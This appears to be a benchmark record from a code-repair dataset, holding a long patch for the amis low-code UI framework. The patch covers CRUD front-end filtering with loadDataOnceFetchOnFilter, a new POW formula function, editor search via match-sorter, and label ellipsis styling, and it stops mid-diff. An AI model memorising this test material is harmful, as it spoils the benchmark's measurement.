base_commit
stringlengths
40
40
created_at
stringdate
2013-07-19 17:10:26
2025-07-23 01:54:17
hints_text
stringlengths
0
525k
instance_id
stringlengths
10
60
patch
stringlengths
174
256k
pr_description
stringlengths
3
99.8k
problem_statement
stringlengths
0
6.69k
pull_number
int64
1
61.8k
repo
stringlengths
5
54
test_patch
stringlengths
173
254k
FAIL_TO_PASS
listlengths
1
122k
PASS_TO_PASS
listlengths
0
190k
interface
stringlengths
4
33.3k
license
stringclasses
11 values
install_config
dict
meta
dict
6885663c1110693e29ecc7736f75f1a466952982
2023-10-11 08:03:57
baidu__amis-8354
diff --git a/docs/zh-CN/components/crud.md b/docs/zh-CN/components/crud.md index 7a3db1a77..971314e2c 100755 --- a/docs/zh-CN/components/crud.md +++ b/docs/zh-CN/components/crud.md @@ -2795,7 +2795,6 @@ CRUD 中不限制有多少个单条操作、添加一个操作对应的添加一 > 本文中的例子为了不相互影响都关闭了这个功能。 > 另外如果需要使用接口联动,需要设置`syncLocation: false` - `syncLocation`开启后,数据域经过地址栏同步后,原始值被转化为字符串同步回数据域,但布尔值(boolean)同步后不符合预期数据结构,导致组件渲染出错。比如查询条件表单中包含[Checkbox](./form/checkbox)组件,此时可以设置`{"trueValue": "1", "falseValue": "0"}`,将真值和假值设置为字符串格式规避。 ## 前端一次性加载 @@ -2846,8 +2845,6 @@ CRUD 中不限制有多少个单条操作、添加一个操作对应的添加一 "syncLocation": false, "api": "/api/mock2/sample", "loadDataOnce": true, - "autoGenerateFilter": true, - "filterSettingSource": ["browser", "version"], "columns": [ { "name": "id", @@ -2895,6 +2892,131 @@ CRUD 中不限制有多少个单条操作、添加一个操作对应的添加一 > **注意:**如果你的数据量较大,请务必使用服务端分页的方案,过多的前端数据展示,会显著影响前端页面的性能 +另外前端一次性加载当有查寻条件的时候,默认还是会重新请求一次,如果配置 `loadDataOnceFetchOnFilter` 为 `false` 则为前端过滤。 + +```schema: scope="body" +{ + "type": "crud", + "syncLocation": false, + "api": "/api/mock2/sample", + "loadDataOnce": true, + "loadDataOnceFetchOnFilter": false, + "autoGenerateFilter": true, + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "engine", + "label": "Rendering engine" + }, + { + "name": "browser", + "label": "Browser" + }, + { + "name": "platform", + "label": "Platform(s)" + }, + { + "name": "version", + "label": "Engine version", + "searchable": { + "type": "select", + "name": "version", + "label": "Engine version", + "clearable": true, + "multiple": true, + "searchable": true, + "checkAll": true, + "options": [ + "1.7", + "3.3", + "5.6" + ], + "maxTagCount": 10, + "extractValue": true, + "joinValues": false, + "delimiter": ",", + "defaultCheckAll": false, + "checkAllLabel": "全选" + } + }, + { + "name": "grade", + "label": "CSS grade" + } + ] +} +``` + +`loadDataOnceFetchOnFilter` 配置成 `true` 则会强制重新请求接口比如以下用法 + +> 此时如果不配置或者配置为 `false` 是前端直接过滤,不过记得配置 name 为行数据中的属性,如果行数据中没有对应属性则不会起作用 + +```schema: scope="body" +{ + "type": 
"crud", + "syncLocation": false, + "api": "/api/mock2/sample", + "loadDataOnce": true, + "loadDataOnceFetchOnFilter": true, + "headerToolbar": [ + { + "type": "search-box", + "name": "keywords" + } + ], + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "engine", + "label": "Rendering engine" + }, + { + "name": "browser", + "label": "Browser" + }, + { + "name": "platform", + "label": "Platform(s)" + }, + { + "name": "version", + "label": "Engine version", + "searchable": { + "type": "select", + "name": "version", + "label": "Engine version", + "clearable": true, + "multiple": true, + "searchable": true, + "checkAll": true, + "options": [ + "1.7", + "3.3", + "5.6" + ], + "maxTagCount": 10, + "extractValue": true, + "joinValues": false, + "delimiter": ",", + "defaultCheckAll": false, + "checkAllLabel": "全选" + } + }, + { + "name": "grade", + "label": "CSS grade" + } + ] +} +``` + ## 动态列 > since 1.1.6 diff --git a/examples/components/CRUD/List.jsx b/examples/components/CRUD/List.jsx index 15d65c389..18aef7409 100644 --- a/examples/components/CRUD/List.jsx +++ b/examples/components/CRUD/List.jsx @@ -3,32 +3,18 @@ export default { remark: 'bla bla bla', body: { type: 'crud', - api: '/api/sample', + name: 'thelist', + api: { + method: 'get', + url: '/api/sample', + sendOn: '${mode}' + }, mode: 'list', draggable: true, saveOrderApi: { url: '/api/sample/saveOrder' }, orderField: 'weight', - filter: { - title: '条件搜索', - submitText: '', - body: [ - { - type: 'input-text', - name: 'keywords', - placeholder: '通过关键字搜索', - addOn: { - label: '搜索', - type: 'submit' - } - }, - { - type: 'plain', - text: '这只是个示例, 目前搜索对查询结果无效.' 
- } - ] - }, affixHeader: true, bulkActions: [ { @@ -63,6 +49,44 @@ export default { ], quickSaveApi: '/api/sample/bulkUpdate', quickSaveItemApi: '/api/sample/$id', + headerToolbar: [ + { + type: 'form', + mode: 'inline', + wrapWithPanel: false, + submitOnChange: true, + submitOnInit: true, + target: 'thelist', + body: [ + { + type: 'select', + name: 'mode', + className: 'mb-0', + selectFirst: true, + options: [ + { + label: '模式 1', + value: 'mode1' + }, + { + label: '模式 2', + value: 'mode2' + } + ] + }, + { + type: 'input-text', + name: 'keywords', + placeholder: '通过关键字搜索', + className: 'mb-0', + addOn: { + label: '搜索', + type: 'submit' + } + } + ] + } + ], listItem: { actions: [ { diff --git a/fis-conf.js b/fis-conf.js index 98590a300..fb70f4d97 100644 --- a/fis-conf.js +++ b/fis-conf.js @@ -253,7 +253,7 @@ fis.match('*.html:jsx', { // 这些用了 esm fis.match( - '{echarts/**.js,zrender/**.js,echarts-wordcloud/**.js,markdown-it-html5-media/**.js,react-hook-form/**.js,qrcode.react/**.js,axios/**.js}', + '{echarts/**.js,zrender/**.js,echarts-wordcloud/**.js,markdown-it-html5-media/**.js,react-hook-form/**.js,qrcode.react/**.js,axios/**.js,downshift/**.js,react-intersection-observer/**.js}', { parser: fis.plugin('typescript', { sourceMap: false, diff --git a/packages/amis-core/src/WithStore.tsx b/packages/amis-core/src/WithStore.tsx index 6e1c37aee..6c9a0d4b9 100644 --- a/packages/amis-core/src/WithStore.tsx +++ b/packages/amis-core/src/WithStore.tsx @@ -252,7 +252,7 @@ export function HocStoreFactory(renderer: { props.store?.storeType === 'ComboStore' ? 
undefined : syncDataFromSuper( - store.data, + props.data, (props.data as any).__super, (prevProps.data as any).__super, store, diff --git a/packages/amis-core/src/renderers/Form.tsx b/packages/amis-core/src/renderers/Form.tsx index 3f88f3910..e33734f60 100644 --- a/packages/amis-core/src/renderers/Form.tsx +++ b/packages/amis-core/src/renderers/Form.tsx @@ -1154,6 +1154,8 @@ export default class Form extends React.Component<FormProps, object> { if (target) { this.submitToTarget(filterTarget(target, values), values); + /** 可能配置页面跳转事件,页面路由变化导致persistKey不一致,无法清除持久化数据,所以提交成功事件之前先清理一下 */ + clearPersistDataAfterSubmit && store.clearLocalPersistData(); dispatchEvent('submitSucc', createObject(this.props.data, values)); } else if (action.actionType === 'reload') { action.target && @@ -1185,6 +1187,7 @@ export default class Form extends React.Component<FormProps, object> { ? filter(saveFailed, store.data) : undefined, onSuccess: async (result: Payload) => { + clearPersistDataAfterSubmit && store.clearLocalPersistData(); // result为提交接口返回的内容 const dispatcher = await dispatchEvent( 'submitSucc', @@ -1245,6 +1248,7 @@ export default class Form extends React.Component<FormProps, object> { }); }); } else { + clearPersistDataAfterSubmit && store.clearLocalPersistData(); // type为submit,但是没有配api以及target时,只派发事件 dispatchEvent('submitSucc', createObject(this.props.data, values)); } diff --git a/packages/amis-core/src/store/crud.ts b/packages/amis-core/src/store/crud.ts index e7c546a94..d254a63f5 100644 --- a/packages/amis-core/src/store/crud.ts +++ b/packages/amis-core/src/store/crud.ts @@ -61,12 +61,11 @@ export const CRUDStore = ServiceStore.named('CRUDStore') // 因为会把数据呈现在地址栏上。 return createObject( createObject(self.data, { - ...self.query, items: self.items.concat(), selectedItems: self.selectedItems.concat(), unSelectedItems: self.unSelectedItems.concat() }), - {} + {...self.query} ); }, @@ -145,8 +144,7 @@ export const CRUDStore = ServiceStore.named('CRUDStore') data?: object, 
options?: fetchOptions & { forceReload?: boolean; - loadDataOnce?: boolean; // 配置数据是否一次性加载,如果是这样,由前端来完成分页,排序等功能。 - loadDataOnceFetchOnFilter?: boolean; // 在开启loadDataOnce时,filter时是否去重新请求api + loadDataOnce?: boolean; // 配置数据是否一次性加载,如果是这样,由前端来完成分页,排序等 source?: string; // 支持自定义属于映射,默认不配置,读取 rows 或者 items loadDataMode?: boolean; syncResponse2Query?: boolean; @@ -159,7 +157,6 @@ export const CRUDStore = ServiceStore.named('CRUDStore') options: fetchOptions & { forceReload?: boolean; loadDataOnce?: boolean; // 配置数据是否一次性加载,如果是这样,由前端来完成分页,排序等功能。 - loadDataOnceFetchOnFilter?: boolean; // 在开启loadDataOnce时,filter时是否去重新请求api source?: string; // 支持自定义属于映射,默认不配置,读取 rows 或者 items loadDataMode?: boolean; syncResponse2Query?: boolean; @@ -181,36 +178,36 @@ export const CRUDStore = ServiceStore.named('CRUDStore') if (Array.isArray(options.columns)) { options.columns.forEach((column: any) => { - let value: any; + let value: any = + typeof column.name === 'string' + ? getVariable(self.query, column.name) + : undefined; const key = column.name; - if ((column.searchable || column.filterable) && key) { + if (value != null && key) { // value可能为null、undefined、''、0 - value = getVariable(self.query, key); - if (value != null) { - if (Array.isArray(value)) { - if (value.length > 0) { - const arr = [...items]; - let arrItems: Array<any> = []; - value.forEach(item => { - arrItems = [ - ...arrItems, - ...matchSorter(arr, item, { - keys: [key], - threshold: matchSorter.rankings.CONTAINS - }) - ]; - }); - items = items.filter((item: any) => - arrItems.find(a => a === item) - ); - } - } else { - items = matchSorter(items, value, { - keys: [key], - threshold: matchSorter.rankings.CONTAINS + if (Array.isArray(value)) { + if (value.length > 0) { + const arr = [...items]; + let arrItems: Array<any> = []; + value.forEach(item => { + arrItems = [ + ...arrItems, + ...matchSorter(arr, item, { + keys: [key], + threshold: matchSorter.rankings.CONTAINS + }) + ]; }); + items = items.filter((item: any) => + 
arrItems.find(a => a === item) + ); } + } else { + items = matchSorter(items, value, { + keys: [key], + threshold: matchSorter.rankings.CONTAINS + }); } } }); diff --git a/packages/amis-core/src/store/table.ts b/packages/amis-core/src/store/table.ts index bd7ec4a84..af99148db 100644 --- a/packages/amis-core/src/store/table.ts +++ b/packages/amis-core/src/store/table.ts @@ -1017,6 +1017,7 @@ export const TableStore = iRendererStore index, width: origin?.width || 0, minWidth: origin?.minWidth || 0, + realWidth: origin?.realWidth || 0, rawIndex: index - PARTITION_INDEX, type: item.type || 'plain', pristine: item.pristine || item, diff --git a/packages/amis-core/src/utils/debug.tsx b/packages/amis-core/src/utils/debug.tsx index c15e9507b..8f4a23371 100644 --- a/packages/amis-core/src/utils/debug.tsx +++ b/packages/amis-core/src/utils/debug.tsx @@ -8,10 +8,12 @@ import {findDOMNode, render, unmountComponentAtNode} from 'react-dom'; // import {createRoot} from 'react-dom/client'; import {autorun, observable} from 'mobx'; import {observer} from 'mobx-react'; -import {uuidv4} from './helper'; +import {uuidv4, importLazyComponent} from './helper'; import position from './position'; -export const JsonView = React.lazy(() => import('react-json-view')); +export const JsonView = React.lazy(() => + import('react-json-view').then(importLazyComponent) +); class Log { @observable cat = ''; diff --git a/packages/amis-core/src/utils/helper.ts b/packages/amis-core/src/utils/helper.ts index 3d4fa48b4..71ddc701d 100644 --- a/packages/amis-core/src/utils/helper.ts +++ b/packages/amis-core/src/utils/helper.ts @@ -1587,7 +1587,7 @@ export function mapObject( } if (Array.isArray(value)) { - return value.map(item => mapObject(item, fn)); + return value.map(item => mapObject(item, fn, skipFn)); } if (isObject(value)) { @@ -1595,7 +1595,8 @@ export function mapObject( Object.keys(tmpValue).forEach(key => { (tmpValue as PlainObject)[key] = mapObject( (tmpValue as PlainObject)[key], - fn + fn, + 
skipFn ); }); return tmpValue; @@ -2174,3 +2175,8 @@ export function evalTrackExpression( }) .join(''); } + +// 很奇怪的问题,react-json-view import 有些情况下 mod.default 才是 esModule +export function importLazyComponent(mod: any) { + return mod.default.__esModule ? mod.default : mod; +} diff --git a/packages/amis-editor-core/src/component/Preview.tsx b/packages/amis-editor-core/src/component/Preview.tsx index c8e62b71e..66ce6f045 100644 --- a/packages/amis-editor-core/src/component/Preview.tsx +++ b/packages/amis-editor-core/src/component/Preview.tsx @@ -413,24 +413,37 @@ export default class Preview extends Component<PreviewProps> { @autobind handleDragEnter(e: React.DragEvent) { + if (!this.props.editable) { + // 非编辑态下不监听拖拽事件 + return; + } const manager = this.props.manager; manager.dnd.dragEnter(e.nativeEvent); } @autobind handleDragLeave(e: React.DragEvent) { + if (!this.props.editable) { + return; + } const manager = this.props.manager; manager.dnd.dragLeave(e.nativeEvent); } @autobind handleDragOver(e: React.DragEvent) { + if (!this.props.editable) { + return; + } const manager = this.props.manager; manager.dnd.dragOver(e.nativeEvent); } @autobind handleDrop(e: React.DragEvent) { + if (!this.props.editable) { + return; + } const manager = this.props.manager; manager.dnd.drop(e.nativeEvent); } diff --git a/packages/amis-editor-core/src/component/base/SearchPanel.tsx b/packages/amis-editor-core/src/component/base/SearchPanel.tsx index c486defea..a71c74d30 100644 --- a/packages/amis-editor-core/src/component/base/SearchPanel.tsx +++ b/packages/amis-editor-core/src/component/base/SearchPanel.tsx @@ -4,6 +4,7 @@ import {Icon, InputBox, resolveVariable} from 'amis'; import cx from 'classnames'; import {autobind, stringRegExp} from '../../util'; import isString from 'lodash/isString'; +import {matchSorter} from 'match-sorter'; /** * 通用搜索功能组件,附带以下功能: @@ -182,7 +183,7 @@ export default class SearchPanel extends React.Component< /** * 根据关键字过滤数据,按分组存放 */ - 
groupedResultByKeyword(keywords?: string) { + groupedResultByKeyword(keywords: string = '') { const {allResult} = this.props; let curSearchResult: any[] = []; let curSearchResultByTag: { @@ -194,21 +195,15 @@ export default class SearchPanel extends React.Component< ? new RegExp(stringRegExp(curKeyword), 'i') : null; - allResult.forEach(item => { - if (isString(item) && regular && regular.test(item)) { + if (allResult.length && isString(allResult[0])) { + matchSorter(allResult, keywords).forEach(item => { // 兼容字符串类型 curSearchResult.push(item); - } else if ( - !keywords || - ['name', 'description', 'scaffold.type', 'searchKeywords'].some(key => { - return ( - resolveVariable(key, item) && - regular && - (regular.test(resolveVariable(key, item)) || - regular.test(resolveVariable(key, item)?.replaceAll('-', ''))) - ); - }) - ) { + }); + } else { + matchSorter(allResult, keywords, { + keys: ['name', 'description', 'scaffold.type', 'searchKeywords'] + }).forEach(item => { if (item[curTagKey]) { const tags = Array.isArray(item[curTagKey]) ? 
item[curTagKey].concat() @@ -222,8 +217,8 @@ export default class SearchPanel extends React.Component< } else { curSearchResult.push(item); } - } - }); + }); + } // 更新当前搜索结果数据(备注: 附带重置功能) this.setState({ diff --git a/packages/amis-editor-core/src/plugin/DataDebug.tsx b/packages/amis-editor-core/src/plugin/DataDebug.tsx index b68429d0d..0e26fc97a 100644 --- a/packages/amis-editor-core/src/plugin/DataDebug.tsx +++ b/packages/amis-editor-core/src/plugin/DataDebug.tsx @@ -1,7 +1,10 @@ import {registerEditorPlugin} from '../manager'; import {BaseEventContext, BasePlugin, BasicToolbarItem} from '../plugin'; import React from 'react'; -export const JsonView = React.lazy(() => import('react-json-view')); +import {importLazyComponent} from 'amis-core'; +export const JsonView = React.lazy(() => + import('react-json-view').then(importLazyComponent) +); /** * 添加调试功能 diff --git a/packages/amis-editor-core/src/store/editor.ts b/packages/amis-editor-core/src/store/editor.ts index 8a9cadd25..62fa33294 100644 --- a/packages/amis-editor-core/src/store/editor.ts +++ b/packages/amis-editor-core/src/store/editor.ts @@ -53,6 +53,7 @@ import isPlainObject from 'lodash/isPlainObject'; import {EditorManagerConfig} from '../manager'; import {EditorNode, EditorNodeType} from './node'; import findIndex from 'lodash/findIndex'; +import {matchSorter} from 'match-sorter'; export interface SchemaHistory { versionId: number; @@ -684,39 +685,26 @@ export const MainStore = types /** 根据关键字过滤组件 */ groupedRenderersByKeyword( _subRenderers: Array<SubRendererInfo>, - keywords?: string + keywords: string = '' ) { const subRenderers = _subRenderers; const grouped: { [propName: string]: Array<SubRendererInfo>; } = {}; - const regular = keywords - ? 
new RegExp(stringRegExp(keywords), 'i') - : null; - - subRenderers.forEach(item => { - if ( - !keywords || - ['name', 'description', 'scaffold.type', 'searchKeywords'].some( - key => - resolveVariable(key, item) && - regular && - (regular.test(resolveVariable(key, item)) || - regular.test(resolveVariable(key, item)?.replaceAll('-', ''))) - ) - ) { - const tags = Array.isArray(item.tags) - ? item.tags.concat() - : item.tags - ? [item.tags] - : ['其他']; - - tags.forEach(tag => { - grouped[tag] = grouped[tag] || []; - grouped[tag].push(item); - }); - } + matchSorter(subRenderers, keywords, { + keys: ['name', 'description', 'scaffold.type', 'searchKeywords'] + }).forEach(item => { + const tags = Array.isArray(item.tags) + ? item.tags.concat() + : item.tags + ? [item.tags] + : ['其他']; + + tags.forEach(tag => { + grouped[tag] = grouped[tag] || []; + grouped[tag].push(item); + }); }); return grouped; diff --git a/packages/amis-editor-core/src/util.ts b/packages/amis-editor-core/src/util.ts index 65f87f69b..4529381b8 100644 --- a/packages/amis-editor-core/src/util.ts +++ b/packages/amis-editor-core/src/util.ts @@ -1063,14 +1063,12 @@ export function getI18nEnabled() { } /** schema 翻译方法 */ -export function translateSchema(schema: any, replaceData?: any) { +export function translateSchema(schema: any, replaceData?: any, skipFn?: any) { replaceData = replaceData || (window as any)?.editorStore?.appCorpusData; if (!isPlainObject(replaceData)) { return schema; } - return mapObject(schema, (item: any) => { - return replaceData[item] || item; - }); + return mapObject(schema, (item: any) => replaceData[item] || item, skipFn); } /** 应用级别的翻译方法 */ diff --git a/packages/amis-editor/src/renderer/FormulaControl.tsx b/packages/amis-editor/src/renderer/FormulaControl.tsx index f00316787..b6c03d110 100644 --- a/packages/amis-editor/src/renderer/FormulaControl.tsx +++ b/packages/amis-editor/src/renderer/FormulaControl.tsx @@ -515,16 +515,16 @@ export default class FormulaControl extends 
React.Component< } else { curRendererSchema.placeholder = '请输入静态值'; } - // 设置popOverContainer - curRendererSchema.popOverContainer = window.document.body; } + JSONPipeOut(curRendererSchema); + // 对 schema 进行国际化翻译 if (this.appLocale && this.appCorpusData) { return translateSchema(curRendererSchema, this.appCorpusData); } - return JSONPipeOut(curRendererSchema); + return curRendererSchema; } @autobind diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index f571ac097..37b95f335 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -268,6 +268,17 @@ 取数据最后一个。 +### POW + +用法:`POW(base, exponent)` + + * `base:number` 基数 + * `exponent:number` 指数 + +返回:`number` 基数的指数次幂 + +返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + ## 文本函数 ### LEFT diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index c3a72cf65..5291b3029 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -465,6 +465,29 @@ export const doc: { }, namespace: '数学函数' }, + { + name: 'POW', + description: + '返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。', + example: 'POW(base, exponent)', + params: [ + { + type: 'number', + name: 'base', + description: '基数' + }, + { + type: 'number', + name: 'exponent', + description: '指数' + } + ], + returns: { + type: 'number', + description: '基数的指数次幂' + }, + namespace: '数学函数' + }, { name: 'LEFT', description: '返回传入文本左侧的指定长度字符串。', diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 7befa4b79..8e44dc051 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -13,6 +13,7 @@ import uniqBy from 'lodash/uniqBy'; import isEqual from 'lodash/isEqual'; import isPlainObject from 'lodash/isPlainObject'; import get from 'lodash/get'; +import isNumber from 'lodash/isNumber'; import {EvaluatorOptions, FilterContext, FilterMap, FunctionMap} from 
'./types'; import {FormulaEvalError} from './error'; @@ -978,6 +979,24 @@ export class Evaluator { return arr.length ? arr[arr.length - 1] : null; } + /** + * 返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + * + * @example POW(base, exponent) + * @param {number} base 基数 + * @param {number} exponent 指数 + * @namespace 数学函数 + * + * @returns {number} 基数的指数次幂 + */ + fnPOW(base: number, exponent: number) { + if (!isNumber(base) || !isNumber(exponent)) { + return base; + } + + return Math.pow(base, exponent); + } + // 文本函数 normalizeText(raw: any) { diff --git a/packages/amis-ui/scss/components/form/_result-list.scss b/packages/amis-ui/scss/components/form/_result-list.scss index de4de56a6..08de5947a 100644 --- a/packages/amis-ui/scss/components/form/_result-list.scss +++ b/packages/amis-ui/scss/components/form/_result-list.scss @@ -53,6 +53,7 @@ > label { flex-basis: px2rem(50px); flex-grow: 1; + width: px2rem(50px); &.is-invalid { color: var(--Form-selectValue-onInvalid-color); diff --git a/packages/amis-ui/scss/components/form/_selection.scss b/packages/amis-ui/scss/components/form/_selection.scss index b1bae3fae..ae5b59927 100644 --- a/packages/amis-ui/scss/components/form/_selection.scss +++ b/packages/amis-ui/scss/components/form/_selection.scss @@ -38,6 +38,12 @@ margin-right: var(--Checkbox-gap); } } + + &-ellipsis-line { + display: inline-block; + width: 100%; + @include truncate(); + } } .#{$ns}GroupedSelection { @@ -104,6 +110,7 @@ &-itemLabel { flex-grow: 1; + overflow: hidden; span { vertical-align: middle; diff --git a/packages/amis-ui/src/components/ChainedSelection.tsx b/packages/amis-ui/src/components/ChainedSelection.tsx index 9cc4b9efc..30b110e1b 100644 --- a/packages/amis-ui/src/components/ChainedSelection.tsx +++ b/packages/amis-ui/src/components/ChainedSelection.tsx @@ -106,7 +106,8 @@ export class ChainedSelection extends BaseSelection< checked: !!~valueArray.indexOf(option), onChange: () => this.toggleOption(option), disabled: 
disabled || option.disabled, - labelField + labelField, + classnames: cx })} </div> </div> @@ -153,7 +154,8 @@ export class ChainedSelection extends BaseSelection< checked: !!~this.state.selected.indexOf(id), onChange: () => this.selectOption(option, depth, id), disabled: disabled || option.disabled, - labelField + labelField, + classnames: cx })} </div> diff --git a/packages/amis-ui/src/components/GroupedSelection.tsx b/packages/amis-ui/src/components/GroupedSelection.tsx index 636574547..d8ee8ee46 100644 --- a/packages/amis-ui/src/components/GroupedSelection.tsx +++ b/packages/amis-ui/src/components/GroupedSelection.tsx @@ -48,7 +48,8 @@ export class GroupedSelection extends BaseSelection<BaseSelectionProps> { checked: false, onChange: () => undefined, disabled: disabled || option.disabled, - labelField + labelField, + classnames: cx })} </div> @@ -92,7 +93,8 @@ export class GroupedSelection extends BaseSelection<BaseSelectionProps> { checked: false, onChange: () => undefined, disabled: disabled || option.disabled, - labelField + labelField, + classnames: cx })} </div> </div> @@ -161,7 +163,8 @@ export class GroupedSelection extends BaseSelection<BaseSelectionProps> { checked: !!~valueArray.indexOf(option), onChange: () => this.toggleOption(option), disabled: disabled || option.disabled, - labelField + labelField, + classnames: cx })} </div> </div> diff --git a/packages/amis-ui/src/components/ResultList.tsx b/packages/amis-ui/src/components/ResultList.tsx index a331cca1a..a97fbbadc 100644 --- a/packages/amis-ui/src/components/ResultList.tsx +++ b/packages/amis-ui/src/components/ResultList.tsx @@ -5,13 +5,13 @@ import React from 'react'; import Sortable from 'sortablejs'; import {findDOMNode} from 'react-dom'; import cloneDeep from 'lodash/cloneDeep'; +import cx from 'classnames'; import {Option, Options} from './Select'; import {ThemeProps, themeable} from 'amis-core'; import {Icon} from './icons'; import {autobind, guid} from 'amis-core'; -import {LocaleProps, 
localeable} from 'amis-core'; -import {BaseSelection, BaseSelectionProps} from './Selection'; +import {LocaleProps, localeable, ClassNamesFn} from 'amis-core'; import TransferSearch from './TransferSearch'; import VirtualList, {AutoSizer} from './virtual-list'; @@ -39,6 +39,7 @@ export interface ItemRenderStates { index: number; disabled?: boolean; labelField?: string; + classnames: ClassNamesFn; onChange: (value: any, name: string) => void; } @@ -51,10 +52,20 @@ export class ResultList extends React.Component< ResultListState > { static itemRender(option: Option, states: ItemRenderStates) { + const scopeLabel = option.scopeLabel || ''; + const label = option[states?.labelField || 'label']; + const canScopeLabelTitle = + typeof scopeLabel === 'string' || typeof scopeLabel === 'number'; + const canLabelTitle = + typeof label === 'string' || typeof label === 'number'; + const title = + canScopeLabelTitle && canLabelTitle ? `${scopeLabel}${label}` : ''; + const classnames = states.classnames; return ( - <span>{`${option.scopeLabel || ''}${ - option[states?.labelField || 'label'] - }`}</span> + <span title={title} className={classnames('Selection-ellipsis-line')}> + {scopeLabel} + {label} + </span> ); } @@ -286,7 +297,8 @@ export class ResultList extends React.Component< index, disabled, onChange: this.handleValueChange.bind(this, index), - labelField + labelField, + classnames: cx })} </label> diff --git a/packages/amis-ui/src/components/Selection.tsx b/packages/amis-ui/src/components/Selection.tsx index 4e9cf8679..b8b6e4753 100644 --- a/packages/amis-ui/src/components/Selection.tsx +++ b/packages/amis-ui/src/components/Selection.tsx @@ -17,7 +17,8 @@ import { findTree, flattenTree, getOptionValue, - getOptionValueBindField + getOptionValueBindField, + ClassNamesFn } from 'amis-core'; import Checkbox from './Checkbox'; import {Option, Options} from './Select'; @@ -56,6 +57,7 @@ export interface ItemRenderStates { checked: boolean; onChange: () => void; disabled?: 
boolean; + classnames: ClassNamesFn; } export class BaseSelection< @@ -63,10 +65,24 @@ export class BaseSelection< S = any > extends React.Component<T, S> { static itemRender(option: Option, states: ItemRenderStates) { + const label = option[states?.labelField || 'label']; + const tip = option.tip || ''; + const classnames = states.classnames; + + const canlabelTitle = + typeof label === 'string' || typeof label === 'number'; + const canTipTitle = typeof tip === 'string' || typeof label === 'number'; + const title = canlabelTitle && canTipTitle ? `${label} ${tip}` : ''; + return ( - <span className={cx({'is-invalid': option?.__unmatched})}> - {option[states?.labelField || 'label']} - {option.tip || ''} + <span + title={title} + className={`${cx({'is-invalid': option?.__unmatched})} ${classnames( + 'Selection-ellipsis-line' + )}`} + > + {label} + {tip} </span> ); } @@ -255,6 +271,7 @@ export class BaseSelection< checked: !!~valueArray.indexOf(option), onChange: () => this.toggleOption(option), labelField, + classnames: cx, disabled: disabled || option.disabled })} </Checkbox> diff --git a/packages/amis-ui/src/components/Transfer.tsx b/packages/amis-ui/src/components/Transfer.tsx index 17da84e71..a8010072e 100644 --- a/packages/amis-ui/src/components/Transfer.tsx +++ b/packages/amis-ui/src/components/Transfer.tsx @@ -420,18 +420,21 @@ export class Transfer< @autobind optionItemRender(option: Option, states: ItemRenderStates) { - const {optionItemRender, labelField = 'label'} = this.props; + const {optionItemRender, labelField = 'label', classnames} = this.props; return optionItemRender ? optionItemRender(option, states) - : BaseSelection.itemRender(option, {labelField, ...states}); + : BaseSelection.itemRender(option, {labelField, ...states, classnames}); } @autobind resultItemRender(option: Option, states: ItemRenderStates) { - const {resultItemRender} = this.props; + const {resultItemRender, classnames} = this.props; return resultItemRender ? 
resultItemRender(option, states) - : ResultList.itemRender(option, states); + : ResultList.itemRender(option, { + ...states, + classnames + }); } renderSelect( diff --git a/packages/amis-ui/src/components/Tree.tsx b/packages/amis-ui/src/components/Tree.tsx index 3f0842151..5766cbf71 100644 --- a/packages/amis-ui/src/components/Tree.tsx +++ b/packages/amis-ui/src/components/Tree.tsx @@ -1261,7 +1261,8 @@ export class TreeSelector extends React.Component< checked: checked, labelField: labelField, onChange: () => this.handleCheck(item, !checked), - disabled: disabled || item.disabled + disabled: disabled || item.disabled, + classnames: cx }) : highlightTxt ? highlight(`${item[labelField]}`, highlightTxt) diff --git a/packages/amis-ui/src/components/TreeSelection.tsx b/packages/amis-ui/src/components/TreeSelection.tsx index 29dd9873a..5145caabc 100644 --- a/packages/amis-ui/src/components/TreeSelection.tsx +++ b/packages/amis-ui/src/components/TreeSelection.tsx @@ -267,7 +267,8 @@ export class TreeSelection extends BaseSelection< multiple: multiple, checked: checked, onChange: () => this.toggleOption(option), - disabled: disabled || option.disabled + disabled: disabled || option.disabled, + classnames: cx })} </div> diff --git a/packages/amis/src/renderers/CRUD.tsx b/packages/amis/src/renderers/CRUD.tsx index 6daa3d5bc..d5dbfd218 100644 --- a/packages/amis/src/renderers/CRUD.tsx +++ b/packages/amis/src/renderers/CRUD.tsx @@ -315,7 +315,11 @@ export interface CRUDCommonSchema extends BaseSchema, SpinnerExtraProps { loadDataOnce?: boolean; /** - * 在开启loadDataOnce时,filter时是否去重新请求api + * 在开启loadDataOnce时,当修改过滤条件时是否重新请求api + * + * 如果没有配置,当查询条件表单触发的会重新请求 api,当是列过滤或者是 search-box 触发的则不重新请求 api + * 如果配置为 true,则不管是什么触发都会重新请求 api + * 如果配置为 false 则不管是什么触发都不会重新请求 api */ loadDataOnceFetchOnFilter?: boolean; @@ -474,7 +478,6 @@ export default class CRUD extends React.Component<CRUDProps, any> { filterTogglable: false, filterDefaultVisible: true, loadDataOnce: false, - 
